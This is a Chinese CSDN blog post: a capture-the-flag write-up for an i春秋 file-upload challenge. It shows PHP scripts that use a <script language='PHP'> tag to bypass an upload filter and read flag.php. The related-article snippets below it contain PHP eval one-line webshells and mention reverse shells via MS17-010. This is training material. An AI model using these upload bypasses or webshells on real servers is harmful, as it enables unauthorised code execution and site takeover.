i春秋-web-upload(文件内容读取)(“百度杯”九月场)

最新推荐文章于 2024-09-04 21:32:24 发布
最新推荐文章于 2024-09-04 21:32:24 发布
阅读量601 收藏
点赞数
分类专栏: i春秋 文章标签: i春秋 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/86513845
版权

提示很明显,flag在flag.php中,所以,任务就是获取flag.php的内容。

方法一:一句话+菜刀(不再叙述)

方法二:上传脚本,使脚本拥有一定权限,再输出flag

先造一个php脚本

<script language="PHP">
   echo((file_get_contents('flag.'.'p'.'h'.'p')));
</script>

访问结果为空白,源码也没有什么东西。
原因是php脚本上传在了一个没有执行权限的文件夹下或是没找到flag.php,于是向上级目录探索:

<script language="PHP">
   echo((file_get_contents('../flag.'.'p'.'h'.'p')));
</script>

返回空白,查看源码拿到flag。

[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8773
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
i春秋Web-Upload(第一届“百度”信息安全攻防总决赛 线上选拔赛)
Sea_Sand息禅
05-15 2220
查看源码: 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头: 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了: import requests import base64 url = 'http://dc587a4fbff7497...
i春秋WEBUpload
金 帛的博客
02-12 457
i春秋webWP
BUUCTF web Upload
最新发布
2301_79555897的博客
09-04 210
使用蚁剑连接,这里需要猜测上传文件路径,最终路径后面改为。但是有个提醒,弹窗警告,说明前端做了过滤,有两种思路。搜索javascript,关闭即可。上传有关的就先写一个简单的木马,一句话木马。和上一题一样,我这里直接用的的上一个的文件。会到靶机页面,刷新后继续上传即可。不是图片格式,用bp抓包,改消息头。密码为 a 密码为自己设定的。在文件根目录下找到flag。利用bp更改后缀为phtml。在根目录后面找flag就行。直接利用蚁剑连接后缀为。蚁剑连接,url后缀。
Web-Upload[i春秋][50pt]
Laurel_60的博客
08-05 1351
> 去年写的,后面有点问题,懒得改了,要看就直接去翻我重写的另一篇吧2333 > https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload
第一届“百度”信息安全攻防总决赛_Upload
a173262565的博客
04-09 284
题目见i春秋ctf训练营 看到fast,就想抓个包看看,以前有道题是打开链接直接来了个跳转,当然这题不是 查看返回包,发现一个好东西 拿去base64解码看看 感觉给出的字符串能继续解码,果然解码后得到一串数字 根据提示要把这串数字以post方式提交,变量名为ichunqiu 看到返回的是fast!!!,看来我的手速是满足不了ichunqiu...
百度 Upload
qq_40273198的博客
04-26 523
访问赛题 URL, 返回包如下HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Type: text/html Content-Length: 87 Connection: keep-alive X-Powered-By: PHP/5.5.9-1ubuntu4.19 Set-Cookie...
百度”CTF比赛 九月--web Upload
hanjinrui15的博客
12-30 676
百度”CTF比赛 九月--web Upload基础知识1、什么是一句话木马?2、一句话木马的简要原理3、html渲染过程解析渲染该过程主要分为以下步骤:解决方案:4、PHP中substr()函数解题思路1、代码分析2、求解题目总结 基础知识 1、什么是一句话木马? 最简单的理解就是,一句话木马上传到网站后台,然后我们可以通过提交参数等的方式去获取shell,比如拿菜刀或者蚁剑等工具。比如下面这段php一句话木马: <?php @eval($_POST['key']) ?> 【基本原理
i春秋 web百度”CTF比赛 九月-Upload & code
ChanCherry的博客
10-13 1032
百度”CTF比赛 九月Upload 可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话: <?php @eval($POST["code"]); ?> 结果发现<?php被过滤了,于是用php脚本标记来绕过过滤: <script language="PHP"> $fh=fopen("../flag.".strtolower("PHP"),'r...
红队专题-Perm权限提升与维持隐匿Privilege Escalation
aming小老弟
10-27 1046
高权限不仅能对更多文件进行增删改查的操作,方便进一步收集主机系统中的敏感信息, system权限也可以提取内存中的密码Hash,为进一步的渗透提供更多信息。权限提升是从初始访问权限(通常是标准用户或应用程序帐户)一直提升到administrator, root甚至SYSTEM访问权限的艺术。常见技术或攻击手段来获得高权限帐户访问权限。用于检测和利用不同权限提升技术的手动方法,但会提到可以完成相同工作并节省您一些时间的自动化工具。 完美,它指向我们的有效负载。 使用net(也是默认安装的)启动此服务以获得
暑期web10:基础的文件上传upload(i春秋)、上传绕过(实验吧)
qq_41618162的博客
08-18 2803
介于之前做了个包括文件上传步骤的题,突然想拿两个之前做过的文件上传题来回顾一下一些基础做法 首先是实验吧的上传绕过 首先我们上传最基础的一句话木马:&amp;lt;?php @eval($_POST['pass']);?&amp;gt; 反馈是‘不被允许的文件类型,仅支持上传jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上传,又回显‘必须上传后缀名为php的文件才行’ 做成php...
百度” CTF比赛 九月 Web-Upload
qq_34106499的博客
01-14 542
1. php一句话木马编写及使用(长标签); 2. 上传文件绕过 ` <? ' , ' php ' 的方法; 3. 菜刀连接php一句话木马;
webupload 上传
fengxing_2的专栏
10-19 445
1. css 文件 .btn-file { position: relative; overflow: hidden; vertical-align: middle; } .btn-file &gt; input { position: absolute; top: 0; right: 0; width: 100%; height: 100%; marg...
百度”信息安全攻防总决赛 Upload
wjd19980925的博客
04-12 446
​ 第一届“百度”信息安全攻防总决赛Upload
百度”CTF比赛 九月 Upload
weixin_43858799的博客
05-19 572
1、 打开题目得到这个界面 2、随便上传一个文件 上传了之后还可以打开 这里就可以尝试上传一个PHP文件来获取到flag 网页源代码显示 上传路径在u目录下 所以需要…/flag.php 返回上一级 打开flag.php 尝试上传一个php文件读取flag。php文件参考http://www.w3school.com.cn/php/php_file_open.asp <?php $ ...
百度2017-九月-upload
weixin_43622501的博客
11-25 125
Upload 题目描述: 提示flag在flag.php中。应该是文件包含类型。 进入题目: 首先尝试进入flag.php文件 http://e72bd1791da64736ae8929a2cac71695278337f40de044bb.game.ichunqiu.com/flag.php 发现提示 here_is_flag 推测就在这个文件里但是被隐藏了,想办法读这个文件内容。 用之前学...
百度”CTF比赛 九月 —— upload
吃肉唐僧的博客
09-07 340
打开题目,发现可以上传任意文件 构造一句话木马文件上传 居然上传成功,点开链接 发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容 换一种方式 <script language="pHp">@eval($_POST['sb'])</script> 上传,菜刀无链接 拿到flag ...
攻防世界-web-upload
wuh2333的博客
12-13 1289
攻防世界,webupload,sql注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值